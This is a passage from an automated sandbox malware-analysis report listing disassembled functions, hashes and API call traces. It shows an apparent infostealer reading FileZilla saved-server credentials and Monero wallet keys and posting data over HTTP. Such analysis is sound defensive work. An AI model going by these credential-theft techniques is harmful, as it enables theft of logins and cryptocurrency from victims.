                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =_}$=_}
                            • API String ID: 0-3933729031
                            • Opcode ID: 05d62d1756f7a452fc1a2424f7c4d7626e912f5c5f739aad1877f4ea5bdeb839
                            • Instruction ID: ce4c5039ff1877ab3c14505d5a26868143ff46b22057c35b073207d092fd7c31
                            • Opcode Fuzzy Hash: 05d62d1756f7a452fc1a2424f7c4d7626e912f5c5f739aad1877f4ea5bdeb839
                            • Instruction Fuzzy Hash: AD614BF3E082109FE3041A2DED157BABBD5EFD4720F1B853EEA8997784D9794C058286
                            Function 0049C563 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6pgc
                            • API String ID: 0-1592974771
                            • Opcode ID: b6923f3eefd06e3ed5dc0daff376640b0cd437a38c96a459ee33e3b37f4fdf91
                            • Instruction ID: 609a8d0490eb8fe5ad40c7eb3bbbeacac11a97d6360dbf7f05b499a1872db9f5
                            • Opcode Fuzzy Hash: b6923f3eefd06e3ed5dc0daff376640b0cd437a38c96a459ee33e3b37f4fdf91
                            • Instruction Fuzzy Hash: 2A514DB3A182109BD3186E2DDC817BBBBD6EB94320F1A853ED6C5C3744E975980087D6
                            Function 00412848 Relevance: .2, Instructions: 220COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39ec2032be4eea9e1ec14b0c6d2776c6319f6d741092b45b95c7b393e1afdc34
                            • Instruction ID: bf5b219c2567d7b4178f6a622624ecc224e3e6013e39fa94936451863562217a
                            • Opcode Fuzzy Hash: 39ec2032be4eea9e1ec14b0c6d2776c6319f6d741092b45b95c7b393e1afdc34
                            • Instruction Fuzzy Hash: D16116F39086109BE3146E29EC8577ABBE4EB84720F1B463DDEC8A3B40D939590486C7
                            Function 0057F5D6 Relevance: .2, Instructions: 175COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94fe54ddd13ad8e2f0ed2b5064ed88316c5dc74d3ea25ae4517bf25faa8166b3
                            • Instruction ID: 1407746c43ad8e3e78da84acec5ea11f0222f56bfcfc33e39e1dc4ed230cdc48
                            • Opcode Fuzzy Hash: 94fe54ddd13ad8e2f0ed2b5064ed88316c5dc74d3ea25ae4517bf25faa8166b3
                            • Instruction Fuzzy Hash: A351D3B361C5119BD308EE2CE95563ABAD5FB90314F26C83ED5CAC7254EA704842B783
                            Function 003E7EDF Relevance: .1, Instructions: 144COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68787be6eae9e02d8795311d5fca561918f52e594173952d0462b6863306bd69
                            • Instruction ID: 62739374b094a49adf98400d83f7453b015b2aa106e54051c517fd84bc8c308e
                            • Opcode Fuzzy Hash: 68787be6eae9e02d8795311d5fca561918f52e594173952d0462b6863306bd69
                            • Instruction Fuzzy Hash: A04134F3A08210AFE7446E79DC8477AB7D9EB98720F1B053EEAC4D7B84E5355C014295
                            Function 0046C9C4 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1111b096715e528c09289e5d4573488d47a8b3ee0401d3e00886b5e7740e4800
                            • Instruction ID: a627ccade63caa481224e939ad8d3a4da180ba7e40c64a9b773d034e1445bafe
                            • Opcode Fuzzy Hash: 1111b096715e528c09289e5d4573488d47a8b3ee0401d3e00886b5e7740e4800
                            • Instruction Fuzzy Hash: B02103B3B483044BF3588869DCC6767B2DAEBC4320F2A823D9B9587BC4DD7D1C054259
                            Function 000F9750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 000F0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000F8E0B
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                              • Part of subcall function 000E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                              • Part of subcall function 000E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                              • Part of subcall function 000E99C0: ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                              • Part of subcall function 000E99C0: LocalFree.KERNEL32(000E148F), ref: 000E9A90
                              • Part of subcall function 000E99C0: CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                              • Part of subcall function 000F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000F8E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00100DBA,00100DB7,00100DB6,00100DB3), ref: 000F0362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F0369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 000F0385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F0393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 000F03CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F03DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 000F0419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F0427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000F0463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F0475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F0502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F0532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000F0562
                            • lstrcat.KERNEL32(?,profile: null), ref: 000F0571
                            • lstrcat.KERNEL32(?,url: ), ref: 000F0580
                            • lstrcat.KERNEL32(?,00000000), ref: 000F0593
                            • lstrcat.KERNEL32(?,00101678), ref: 000F05A2
                            • lstrcat.KERNEL32(?,00000000), ref: 000F05B5
                            • lstrcat.KERNEL32(?,0010167C), ref: 000F05C4
                            • lstrcat.KERNEL32(?,login: ), ref: 000F05D3
                            • lstrcat.KERNEL32(?,00000000), ref: 000F05E6
                            • lstrcat.KERNEL32(?,00101688), ref: 000F05F5
                            • lstrcat.KERNEL32(?,password: ), ref: 000F0604
                            • lstrcat.KERNEL32(?,00000000), ref: 000F0617
                            • lstrcat.KERNEL32(?,00101698), ref: 000F0626
                            • lstrcat.KERNEL32(?,0010169C), ref: 000F0635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00100DB2), ref: 000F068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: bd5c0a13af1b0ca12af3a0f5fc467c9a7a3f20ea77eeeff96ce485268875941b
                            • Instruction ID: bc86cc62a64d213039ef9481aac3efb8e0fcc2f8fd0f212a0c89b9b60ec43f4e
                            • Opcode Fuzzy Hash: bd5c0a13af1b0ca12af3a0f5fc467c9a7a3f20ea77eeeff96ce485268875941b
                            • Instruction Fuzzy Hash: F0D134B1A0010CABCB14EBF4DD55EFE777CAF55300F408418F606A6496DFB4AA0ADB62
                            Function 000E5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000E4839
                              • Part of subcall function 000E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000E4849
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000E59F8
                            • StrCmpCA.SHLWAPI(?,0122E878), ref: 000E5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000E5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0122E898,00000000,?,0122A570,00000000,?,00101A1C), ref: 000E5E71
                            • lstrlen.KERNEL32(00000000), ref: 000E5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000E5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E5E9A
                            • lstrlen.KERNEL32(00000000), ref: 000E5EAF
                            • lstrlen.KERNEL32(00000000), ref: 000E5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000E5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 000E5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000E5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000E5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 000E5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 000E5FBD
                            • HttpOpenRequestA.WININET(00000000,0122E768,?,0122E458,00000000,00000000,00400100,00000000), ref: 000E5BF8
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • InternetCloseHandle.WININET(00000000), ref: 000E5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 6e1224eb1fceb909fa31c919d4d573f7298c782f9a0d6c2c03944bdf4974e99d
                            • Instruction ID: 2441efe49678f51851d18afa356fb48ed7aac3a17883bd6f162b2a63e08617d3
                            • Opcode Fuzzy Hash: 6e1224eb1fceb909fa31c919d4d573f7298c782f9a0d6c2c03944bdf4974e99d
                            • Instruction Fuzzy Hash: 991210B192011CABCB15EBA0DC95FEEB378BF15740F404169B20A62492DFB42B4ADF65
                            Function 000ECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F8B60: GetSystemTime.KERNEL32(00100E1A,0122A2A0,001005AE,?,?,000E13F9,?,0000001A,00100E1A,00000000,?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000F8B86
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000ECF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000ED0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000ED0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED208
                            • lstrcat.KERNEL32(?,00101478), ref: 000ED217
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED22A
                            • lstrcat.KERNEL32(?,0010147C), ref: 000ED239
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED24C
                            • lstrcat.KERNEL32(?,00101480), ref: 000ED25B
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED26E
                            • lstrcat.KERNEL32(?,00101484), ref: 000ED27D
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED290
                            • lstrcat.KERNEL32(?,00101488), ref: 000ED29F
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED2B2
                            • lstrcat.KERNEL32(?,0010148C), ref: 000ED2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 000ED2D4
